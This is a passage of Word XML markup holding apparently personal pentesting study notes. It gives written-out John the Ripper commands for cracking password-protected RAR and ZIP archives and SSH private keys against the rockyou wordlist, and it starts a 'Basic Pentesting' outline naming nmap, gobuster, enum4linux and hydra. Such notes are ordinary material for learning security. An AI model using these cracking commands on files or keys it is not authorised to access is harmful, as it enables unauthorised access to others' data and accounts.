      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>path to wordlist] --rule=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PoloPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> [path to file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2317B57F" w14:textId="6C8B21E6" w:rsidR="0062309E" w:rsidRPr="0084205E" w:rsidRDefault="0062309E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking Password Protected RAR Archives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACE110" w14:textId="72AD9E68" w:rsidR="0062309E" w:rsidRPr="0084205E" w:rsidRDefault="0062309E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Rar2John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A2DF24" w14:textId="5CC7297B" w:rsidR="0062309E" w:rsidRPr="0084205E" w:rsidRDefault="0062309E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">converts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file into a hash format john </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>is able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> understand</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F328B" w14:textId="467FA74D" w:rsidR="0062309E" w:rsidRPr="0084205E" w:rsidRDefault="0062309E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>rar2john [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file] &gt; [output file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A421016" w14:textId="5B67C923" w:rsidR="00305597" w:rsidRPr="0084205E" w:rsidRDefault="00305597" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. rar2john </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rarfile.rar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &gt; rar_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379C3D40" w14:textId="54ADF01C" w:rsidR="00305597" w:rsidRPr="0084205E" w:rsidRDefault="00305597" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE145AE" w14:textId="02D28059" w:rsidR="00305597" w:rsidRPr="0084205E" w:rsidRDefault="00305597" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/rockyou.txt rar_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60928C6E" w14:textId="1B78A231" w:rsidR="008C62DD" w:rsidRPr="0084205E" w:rsidRDefault="008C62DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">sudo apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>unrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DF30498" w14:textId="5945122E" w:rsidR="008C62DD" w:rsidRPr="0084205E" w:rsidRDefault="008C62DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>unrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> e &lt;.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D761A7" w14:textId="25AA474D" w:rsidR="008C62DD" w:rsidRPr="0084205E" w:rsidRDefault="008C62DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking SSH Keys with John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E090D" w14:textId="3B579B44" w:rsidR="008C62DD" w:rsidRPr="0084205E" w:rsidRDefault="008C62DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSH2John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEC5054" w14:textId="32798542" w:rsidR="008C62DD" w:rsidRPr="0084205E" w:rsidRDefault="008C62DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>conversion tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA0D04" w14:textId="590ADB2E" w:rsidR="008C62DD" w:rsidRPr="0084205E" w:rsidRDefault="008C62DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>can use ssh2john.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10875F16" w14:textId="1BDD57FA" w:rsidR="008C62DD" w:rsidRPr="0084205E" w:rsidRDefault="008C62DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/opt/john/ssh2john.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1584DB54" w14:textId="706A0DBB" w:rsidR="008C62DD" w:rsidRPr="0084205E" w:rsidRDefault="008C62DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>replace ssh2john command with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DBCBD" w14:textId="03B7903F" w:rsidR="008C62DD" w:rsidRPr="0084205E" w:rsidRDefault="008C62DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>python3 /opt/john/ssh2john.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34257FC1" w14:textId="265999B6" w:rsidR="00F276F6" w:rsidRPr="0084205E" w:rsidRDefault="00F276F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh2john [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> private key file] &gt; [output file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566AB4E1" w14:textId="0A166125" w:rsidR="00F276F6" w:rsidRPr="0084205E" w:rsidRDefault="00F276F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. ssh2john </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &gt; id_rsa_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17998A15" w14:textId="5B6BD495" w:rsidR="00F276F6" w:rsidRPr="0084205E" w:rsidRDefault="00F276F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C73F3B" w14:textId="4B2C990D" w:rsidR="00F276F6" w:rsidRPr="0084205E" w:rsidRDefault="00F276F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>feed file output from ssh2john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F86C81" w14:textId="38626D56" w:rsidR="00F276F6" w:rsidRPr="0084205E" w:rsidRDefault="00F276F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/rockyou.txt id_rsa_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33095183" w14:textId="25FDFAFD" w:rsidR="00623E62" w:rsidRPr="0084205E" w:rsidRDefault="00623E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking Password Protected Zip Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B928C50" w14:textId="74F33969" w:rsidR="00623E62" w:rsidRPr="0084205E" w:rsidRDefault="00623E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Zip2John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EE7804" w14:textId="51248733" w:rsidR="00623E62" w:rsidRPr="0084205E" w:rsidRDefault="00623E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>zip2john [options] [zip file] &gt; [output file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01638314" w14:textId="33DC0E36" w:rsidR="00623E62" w:rsidRPr="0084205E" w:rsidRDefault="00623E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. zip2john zipfile.zip &gt; zip_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C19F746" w14:textId="1093EA1F" w:rsidR="00623E62" w:rsidRPr="0084205E" w:rsidRDefault="00623E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15894F80" w14:textId="04DB3CCE" w:rsidR="00623E62" w:rsidRPr="0084205E" w:rsidRDefault="00623E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/rockyou.txt zip_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B84DC0" w14:textId="5591D075" w:rsidR="00623E62" w:rsidRPr="0084205E" w:rsidRDefault="00623E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>unzip secure.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C793B" w14:textId="7C634CED" w:rsidR="00623E62" w:rsidRPr="0084205E" w:rsidRDefault="00623E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Further Reading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B13DE" w14:textId="37C59BB8" w:rsidR="00623E62" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidR="000C032D" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.openwall.com/john/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C01BDF6" w14:textId="7E7680AF" w:rsidR="000C032D" w:rsidRPr="0084205E" w:rsidRDefault="000C032D" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D09443" w14:textId="3774E01C" w:rsidR="007657B4" w:rsidRPr="0084205E" w:rsidRDefault="004E6D9F" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Basic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19C6511D" w14:textId="656EC135" w:rsidR="005662DF" w:rsidRPr="0084205E" w:rsidRDefault="005662DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64F6F820" w14:textId="646C4A2B" w:rsidR="005662DF" w:rsidRPr="0084205E" w:rsidRDefault="005662DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>http port open – navigate in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966466A" w14:textId="6C560867" w:rsidR="005662DF" w:rsidRPr="0084205E" w:rsidRDefault="005662DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>inspect page source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8D37C7" w14:textId="4D1DA778" w:rsidR="005662DF" w:rsidRPr="0084205E" w:rsidRDefault="005662DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>inspect element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AE8708" w14:textId="7D1B2405" w:rsidR="005662DF" w:rsidRPr="0084205E" w:rsidRDefault="005662DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1541DBF7" w14:textId="4FF42165" w:rsidR="005662DF" w:rsidRPr="0084205E" w:rsidRDefault="005662DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>directorys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63B205BE" w14:textId="6BE1CECF" w:rsidR="005662DF" w:rsidRPr="0084205E" w:rsidRDefault="005662DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>input in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C7D03D" w14:textId="3023C342" w:rsidR="00C13E94" w:rsidRPr="0084205E" w:rsidRDefault="00C13E94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67069304" w14:textId="25755962" w:rsidR="00004A8D" w:rsidRPr="0084205E" w:rsidRDefault="00004A8D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F2D9A6" w14:textId="2E80DABF" w:rsidR="00004A8D" w:rsidRPr="0084205E" w:rsidRDefault="00574F80" w:rsidP="0084205E">
      <w:pPr>
